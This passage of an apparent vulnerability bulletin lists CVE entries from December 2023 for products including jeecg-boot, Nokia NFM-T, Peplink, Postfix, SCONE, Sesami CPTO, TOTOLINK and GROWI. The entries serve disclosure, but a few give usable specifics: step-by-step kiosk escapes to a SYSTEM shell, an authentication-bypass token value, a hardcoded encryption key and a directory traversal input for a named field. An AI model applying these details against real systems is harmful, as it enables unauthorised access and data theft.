jeecgboot — jeecgboot SQL injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component. 2023-12-30 not yet calculated CVE-2023-41542
cve@mitre.org
jeecgboot — jeecgboot SQL injection vulnerability in jeecg-boot v3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check. 2023-12-30 not yet calculated CVE-2023-41543
cve@mitre.org
cve@mitre.org
jeecgboot — jeecgboot SSTI injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to execute arbitrary code via crafted HTTP request to the /jmreport/loadTableData component. 2023-12-30 not yet calculated CVE-2023-41544
cve@mitre.org
jizhicms — jizhicms File Upload vulnerability in JIZHICMS v.2.5, allows remote attacker to execute arbitrary code via a crafted file uploaded and downloaded to the download_url parameter in the app/admin/exts/ directory. 2023-12-28 not yet calculated CVE-2023-50692
cve@mitre.org
jline-groovy — jline-groovy An issue in the component GroovyEngine.execute of jline-groovy v3.24.1 allows attackers to cause an OOM (OutofMemory) error. 2023-12-29 not yet calculated CVE-2023-50572
cve@mitre.org
json-path — json-path json-path v2.8.0 was discovered to contain a stack overflow via the Criteria.parse() method. 2023-12-27 not yet calculated CVE-2023-51074
cve@mitre.org
kami_vision — yi_iot The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. 2023-12-27 not yet calculated CVE-2023-47882
cve@mitre.org
cve@mitre.org
kantega_sso — kantega_saml The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.) 2023-12-29 not yet calculated CVE-2023-52240
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
layui — layui layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter. 2023-12-30 not yet calculated CVE-2023-50550
cve@mitre.org
little_backup_box — little_backup_box outdoorbits little-backup-box (aka Little Backup Box) before f39f91c allows remote attackers to execute arbitrary code because the PHP extract function is used for untrusted input. 2023-12-30 not yet calculated CVE-2023-52262
cve@mitre.org
cve@mitre.org
logobee — logobee LogoBee 0.2 allows updates.php?id= XSS. 2023-12-30 not yet calculated CVE-2023-52257
cve@mitre.org
microhttpserver — microhttpserver In MicroHttpServer (aka Micro HTTP Server) through a8ab029, _ParseHeader in lib/server.c allows a one-byte recv buffer overflow via a long URI. 2023-12-25 not yet calculated CVE-2023-51771
cve@mitre.org
cve@mitre.org
mingsoft — mcms
 		 Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do. 2023-12-30 not yet calculated CVE-2023-50578
cve@mitre.org
multiple_vendors — multiple_products Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. 2023-12-22 not yet calculated CVE-2023-24609
cve@mitre.org
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon fz_new_pixmap_from_float_data() of pixmap.c. 2023-12-26 not yet calculated CVE-2023-51103
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon pnm_binary_read_image() of load-pnm.c line 527. 2023-12-26 not yet calculated CVE-2023-51104
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function bmp_decompress_rle4() of load-bmp.c. 2023-12-26 not yet calculated CVE-2023-51105
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon pnm_binary_read_image() of load-pnm.c. 2023-12-26 not yet calculated CVE-2023-51106
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon compute_color() of jquant2.c. 2023-12-26 not yet calculated CVE-2023-51107
cve@mitre.org
mupnp_for_c — mupnp_for_c mupnp/net/uri.c in mUPnP for C through 3.0.2 has an out-of-bounds read and application crash because it lacks a certain host length recalculation. 2023-12-28 not yet calculated CVE-2023-52152
cve@mitre.org
mvel2 — mvel2 A TimeOut error exists in the ParseTools.subCompileExpression method in mvel2 v2.5.0 Final. 2023-12-27 not yet calculated CVE-2023-51079
cve@mitre.org
ncp_engineering_inc. — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 13.10 allows attackers to execute DLL files with SYSTEM privileges by creating a symbolic link from a %LOCALAPPDATA%TempNcpSupport* location. 2023-12-25 not yet calculated CVE-2023-28872
cve@mitre.org
nokia — nfm-t_r19.9 In NOKIA NFM-T R19.9, an OS Command Injection vulnerability occurs in /cgi-bin/R19.9/log.pl of the VM Manager WebUI via the cmd HTTP GET parameter. This allows authenticated users to execute commands, with root privileges, on the operating system. 2023-12-25 not yet calculated CVE-2022-39818
cve@mitre.org
nokia — nfm-t_r19.9 In Network Element Manager in NOKIA NFM-T R19.9, an Unprotected Storage of Credentials vulnerability occurs under /root/RestUploadManager.xml.DRC and /DEPOT/KECustom_199/OTNE_DRC/RestUploadManager.xml. A remote user, authenticated to the operating system, with access privileges to the directory /root or /DEPOT, is able to read cleartext credentials to access the web portal NFM-T and control all the PPS Network elements. 2023-12-25 not yet calculated CVE-2022-39820
cve@mitre.org
nokia — nfm-t_r19.9 In NOKIA NFM-T R19.9, a SQL Injection vulnerability occurs in /cgi-bin/R19.9/easy1350.pl of the VM Manager WebUI via the id or host HTTP GET parameter. An authenticated attacker is required for exploitation. 2023-12-25 not yet calculated CVE-2022-39822
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Relative Path Traversal can occur under /oms1350/data/cpb/log of the Network Element Manager via the filename parameter, allowing a remote authenticated attacker to read arbitrary files. 2023-12-25 not yet calculated CVE-2022-41760
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. An Absolute Path Traversal vulnerability exists under /cgi-bin/R19.9/viewlog.pl of the VM Manager WebUI via the logfile parameter, allowing a remote authenticated attacker to read arbitrary files. 2023-12-25 not yet calculated CVE-2022-41761
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Multiple Reflected XSS vulnerabilities exist in the Network Element Manager via any parameter to log.pl, the bench or pid parameter to top.pl, or the id parameter to easy1350.pl. 2023-12-25 not yet calculated CVE-2022-41762
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Reflected XSS in the Network Element Manager exists via /oms1350/pages/otn/cpbLogDisplay via the filename parameter, under /oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay via the id parameter, and under /oms1350/pages/otn/mainOtn via all parameters. 2023-12-25 not yet calculated CVE-2022-43675
cve@mitre.org
ocpp-jaxb — ocpp-jaxb SteVe Community ocpp-jaxb before 0.0.8 generates invalid timestamps such as ones with month 00 in certain situations (such as when an application receives a StartTransaction Open Charge Point Protocol message with a timestamp parameter of 1000000). This may lead to a SQL exception in applications and may undermine the integrity of transaction records. 2023-12-26 not yet calculated CVE-2023-52096
cve@mitre.org
cve@mitre.org
cve@mitre.org
one_identity — password_manager One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: go to the Google ReCAPTCHA section, click on the Privacy link, observe that there is a new browser window, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITYSYSTEM. 2023-12-25 not yet calculated CVE-2023-48654
cve@mitre.org
cve@mitre.org
one_identity — password_manager One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: wait for a session timeout, click on the Help icon, observe that there is a browser window for the One Identity website, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITYSYSTEM. 2023-12-25 not yet calculated CVE-2023-51772
cve@mitre.org
cve@mitre.org
opencrx — opencrx openCRX 5.2.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name field after creation of a Tracker in Manage Activity. 2023-12-26 not yet calculated CVE-2023-27150
cve@mitre.org
cve@mitre.org
opennds — opennds OpenNDS, as used in Sierra Wireless ALEOS before 4.17.0.12 and other products, allows remote attackers to cause a denial of service (NULL pointer dereference, daemon crash, and Captive Portal outage) via a GET request to /opennds_auth/ that lacks a custom query string parameter and client-token. 2023-12-25 not yet calculated CVE-2023-38321
cve@mitre.org
cve@mitre.org
cve@mitre.org
openssh — openssh OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges. 2023-12-24 not yet calculated CVE-2023-51767
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
passwork — passwork Passwork before 6.2.0 allows remote authenticated users to bypass 2FA by sending all one million of the possible 6-digit codes. 2023-12-26 not yet calculated CVE-2023-49949
cve@mitre.org
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. Command injection in the traceroute feature of the administration console allows users with admin privileges to execute arbitrary commands as root. 2023-12-25 not yet calculated CVE-2023-49226
cve@mitre.org
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. Console port authentication uses hard-coded credentials, which allows an attacker with physical access and sufficient knowledge to execute arbitrary commands as root. 2023-12-28 not yet calculated CVE-2023-49228
cve@mitre.org
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in the administration web service allows read-only unprivileged users to obtain sensitive information about the device configuration. 2023-12-28 not yet calculated CVE-2023-49229
cve@mitre.org
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals’ configurations without prior authentication. 2023-12-28 not yet calculated CVE-2023-49230
cve@mitre.org
cve@mitre.org
perl_spreadsheet::parseexcel — perl_spreadsheet::parseexcel Spreadsheet::ParseExcel version 0.65 is a Perl module used for parsing Excel files. Spreadsheet::ParseExcel is vulnerable to an arbitrary code execution (ACE) vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic. 2023-12-24 not yet calculated CVE-2023-7101
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
phpgurukul — small_crm
 		 PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection on the Users login panel because of “password” parameter is directly used in the SQL query without any sanitization and the SQL Injection payload being executed. 2023-12-29 not yet calculated CVE-2023-50035
cve@mitre.org
postfix — postfix Postfix through 3.8.4 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required: the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9. 2023-12-24 not yet calculated CVE-2023-51764
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
prestashop — prestashop SQL Injection vulnerability in the Innovadeluxe Quick Order module for PrestaShop before v.1.4.0, allows local attackers to execute arbitrary code via the getProducts() function in the productlist.php file. 2023-12-28 not yet calculated CVE-2023-46989
cve@mitre.org
proftpd — proftpd make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. 2023-12-22 not yet calculated CVE-2023-51713
cve@mitre.org
cve@mitre.org
cve@mitre.org
qt — qt An issue was discovered in the HTTP2 implementation in Qt before 5.15.17, 6.x before 6.2.11, 6.3.x through 6.5.x before 6.5.4, and 6.6.x before 6.6.2. network/access/http2/hpacktable.cpp has an incorrect HPack integer overflow check. 2023-12-24 not yet calculated CVE-2023-51714
cve@mitre.org
cve@mitre.org
resumable_js — resumable_js resumable.php (aka PHP backend for resumable.js) 0.1.4 before 3c6dbf5 allows arbitrary file upload anywhere in the filesystem via ../ in multipart/form-data content to upload.php. (File overwrite hasn’t been possible with the code available in GitHub in recent years, however.) 2023-12-26 not yet calculated CVE-2023-52086
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
ruby_on_rails — ruby_on_rails In ActiveAdmin (aka Active Admin) before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data (that belongs to another user) by making CSV export requests at certain specific times. 2023-12-28 not yet calculated CVE-2023-50448
cve@mitre.org
cve@mitre.org
ruby_on_rails — ruby_on_rails csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection. 2023-12-24 not yet calculated CVE-2023-51763
cve@mitre.org
cve@mitre.org
cve@mitre.org
rws — worldserver An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint. 2023-12-25 not yet calculated CVE-2022-34267
cve@mitre.org
cve@mitre.org
rws — worldserver An issue was discovered in RWS WorldServer before 11.7.3. /clientLogin deserializes Java objects without authentication, leading to command execution on the host. 2023-12-25 not yet calculated CVE-2022-34268
cve@mitre.org
cve@mitre.org
scone — scone A lack of pointer-validation logic in the __scone_dispatch component of SCONE before v5.8.0 for Intel SGX allows attackers to access sensitive information. 2023-12-30 not yet calculated CVE-2022-46486
cve@mitre.org
cve@mitre.org
cve@mitre.org
scone — scone Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis. 2023-12-30 not yet calculated CVE-2022-46487
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
scone — scone An issue was discovered in SCONE Confidential Computing Platform before 5.8.0 for Intel SGX. Lack of pointer-alignment logic in __scone_dispatch and other entry functions allows a local attacker to access unauthorized information, aka an “AEPIC Leak.” 2023-12-30 not yet calculated CVE-2023-38023
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
seacms — seacms SeaCMS v12.9 was discovered to contain a remote code execution (RCE) vulnerability via the component /augap/adminip.php. 2023-12-28 not yet calculated CVE-2023-46987
cve@mitre.org
cve@mitre.org
cve@mitre.org
seacms — seacms A cross-site scripting (XSS) vulnerability in the component admin_ Video.php of SeaCMS v12.8 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. 2023-12-28 not yet calculated CVE-2023-50470
cve@mitre.org
cve@mitre.org
cve@mitre.org
sendmail — sendmail sendmail through at least 8.14.7 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because sendmail supports <LF>.<CR><LF> but some other popular e-mail servers do not. 2023-12-24 not yet calculated CVE-2023-51765
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows local attackers to obtain sensitive information and bypass authentication via “Back Button Refresh” attack. 2023-12-29 not yet calculated CVE-2023-31292
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to obtain sensitive information and bypass profile restriction via improper access control in the Reader system user’s web browser, allowing the journal to be displayed, despite the option being disabled. 2023-12-29 not yet calculated CVE-2023-31293
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the Delivery Name field. 2023-12-29 not yet calculated CVE-2023-31294
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the User Profile field. 2023-12-29 not yet calculated CVE-2023-31295
cve@mitre.org
sesami_io — sesami_io CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows attackers to obtain sensitive information via the User Name field. 2023-12-29 not yet calculated CVE-2023-31296
cve@mitre.org
sesami_io — sesami_io An issue was discovered in SESAMI planfocus CPTO (Cash Point & Transport Optimizer) 6.3.8.6 718. There is XSS via the Name field when modifying a client. 2023-12-25 not yet calculated CVE-2023-31297
cve@mitre.org
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the User ID field when creating a new system user. 2023-12-29 not yet calculated CVE-2023-31298
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Barcode field of a container. 2023-12-29 not yet calculated CVE-2023-31299
cve@mitre.org
sesami_io — sesami_io An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via transmission of unencrypted, cleartext credentials during Password Reset feature. 2023-12-29 not yet calculated CVE-2023-31300
cve@mitre.org
sesami_io — sesami_io Stored Cross Site Scripting (XSS) Vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the Username field of the login form and application log. 2023-12-29 not yet calculated CVE-2023-31301
cve@mitre.org
sesami_io — sesami_io Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Teller field. 2023-12-29 not yet calculated CVE-2023-31302
cve@mitre.org
shaarli — shaarli Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2, allows remote attackers to execute arbitrary code via search tag function. 2023-12-28 not yet calculated CVE-2023-49469
cve@mitre.org
cve@mitre.org
shenzhen_tcl_new_technology_co.,_limited — tv_web_browser An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component. 2023-12-27 not yet calculated CVE-2023-43481
cve@mitre.org
simple_http_server/simple_http_server_plus — simple_http_server/simple_http_server_plus Phlox com.phlox.simpleserver (aka Simple HTTP Server) 1.8 and com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus have a hardcoded aKySWb2jjrr4dzkYXczKRt7K encryption key. The threat is from a man-in-the-middle attacker who can intercept and potentially modify data during transmission. 2023-12-27 not yet calculated CVE-2023-46919
cve@mitre.org
simple_http_server_plus — simple_http_server_plus Phlox com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus has an Android manifest file that contains an entry with the android:allowBackup attribute set to true. This could be leveraged by an attacker with physical access to the device. 2023-12-27 not yet calculated CVE-2023-46918
cve@mitre.org
simplemobiletools — simple_dialer An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity. 2023-12-27 not yet calculated CVE-2023-49003
cve@mitre.org
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. 2023-12-29 not yet calculated CVE-2023-50070
cve@mitre.org
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. 2023-12-29 not yet calculated CVE-2023-50071
cve@mitre.org
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) before 4.3.17, 4.4.x through 4.6.x before 4.6.4, and 4.7.x before 4.7.1. It affects user accounts for which the password has an equals sign or space character. The serverd process logs such passwords in cleartext, and potentially sends these logs to the Syslog component. 2023-12-26 not yet calculated CVE-2023-28616
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) SNS 4.3.13 through 4.3.22 before 4.3.23, SNS 4.6.0 through 4.6.9 before 4.6.10, and SNS 4.7.0 through 4.7.1 before 4.7.2. An attacker can overflow the cookie threshold, making an IPsec connection impossible. 2023-12-25 not yet calculated CVE-2023-47091
cve@mitre.org
cve@mitre.org
sudo — sudo Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. 2023-12-22 not yet calculated CVE-2023-42465
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
sysaid_on-premise — sysaid_on-premise In SysAid On-Premise before 23.3.34, there is an edge case in which an end user is able to delete a Knowledge Base article, aka bug 15102. 2023-12-25 not yet calculated CVE-2023-47247
cve@mitre.org
testlink — testlink TestLink through 1.9.20 allows type juggling for authentication bypass because === is not used. 2023-12-30 not yet calculated CVE-2023-50110
cve@mitre.org
textpattern_cms — textpattern_cms
 		 There is an arbitrary file upload vulnerability in the background of textpattern cms v4.8.8, which leads to the loss of server permissions. 2023-12-28 not yet calculated CVE-2023-50038
cve@mitre.org
cve@mitre.org
thirty_bees — thirty_bees A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. 2023-12-22 not yet calculated CVE-2023-45957
cve@mitre.org
cve@mitre.org
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. 2023-12-22 not yet calculated CVE-2023-51034
cve@mitre.org
totolink — ex1200l TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. 2023-12-22 not yet calculated CVE-2023-51035
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRoute. 2023-12-30 not yet calculated CVE-2023-51133
cve@mitre.org
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formPasswordSetup. 2023-12-30 not yet calculated CVE-2023-51135
cve@mitre.org
cve@mitre.org
totolink — x2000r_gh TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRebootSchedule. 2023-12-30 not yet calculated CVE-2023-51136
cve@mitre.org
cve@mitre.org
totolink — x6000r TOTOLINK X6000R v9.4.0cu.852_B20230719 was discovered to contain a remote command execution (RCE) vulnerability via the component /cgi-bin/cstecgi.cgi. 2023-12-30 not yet calculated CVE-2023-50651
cve@mitre.org
cve@mitre.org
tp-link — tapo Incorrect access control in TP-Link Tapo before v3.1.315 allows attackers to access user credentials in plaintext. 2023-12-28 not yet calculated CVE-2023-34829
cve@mitre.org
tv_bro_application — tv_bro_application The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files. and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData. 2023-12-27 not yet calculated CVE-2023-43955
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
tv_browser_application_for_android — tv_browser_application_for_android The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity. 2023-12-27 not yet calculated CVE-2023-47883
cve@mitre.org
cve@mitre.org
cve@mitre.org
typo3 — typo3 In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST /typo3/record/edit with ../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. 2023-12-25 not yet calculated CVE-2023-30451
cve@mitre.org
unified_remote — unified_remote Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. 2023-12-30 not yet calculated CVE-2023-52252
cve@mitre.org
cve@mitre.org
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the presentation feature of GROWI versions prior to v3.4.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-42436
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the App Settings (/admin/app) page and the Markdown Settings (/admin/markdown) page of GROWI versions prior to v3.5.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-45737
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability when processing profile images exists in GROWI versions prior to v4.1.3. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-45740
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Cross-site request forgery (CSRF) vulnerability exists in the User settings (/me) page of GROWI versions prior to v6.0.0. If a user views a malicious page while logging in, settings may be changed without the user’s intention. 2023-12-26 not yet calculated CVE-2023-46699
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability which is exploiting a behavior of the XSS Filter exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-47215
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability via the img tags exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49119
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the event handlers of the pre tags in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49598
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the anchor tag of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49779
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability when processing the MathJax exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-49807
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Stored cross-site scripting vulnerability exists in the App Settings (/admin/app) page, the Markdown Settings (/admin/markdown) page, and the Customize (/admin/customize) page of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. 2023-12-26 not yet calculated CVE-2023-50175
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi The App Settings (/admin/app) page in GROWI versions prior to v6.0.6 stores sensitive information in cleartext form. As a result, the Secret access key for external service may be obtained by an attacker who can access the App Settings page. 2023-12-26 not yet calculated CVE-2023-50294
vultures@jpcert.or.jp
vultures@jpcert.or.jp
weseek,_inc. — growi Improper authorization vulnerability exists in the User Management (/admin/users) page of GROWI versions prior to v6.0.6. If this vulnerability is exploited, a user may delete or suspend its own account without the user’s intention. 2023-12-26 not yet calculated CVE-2023-50332
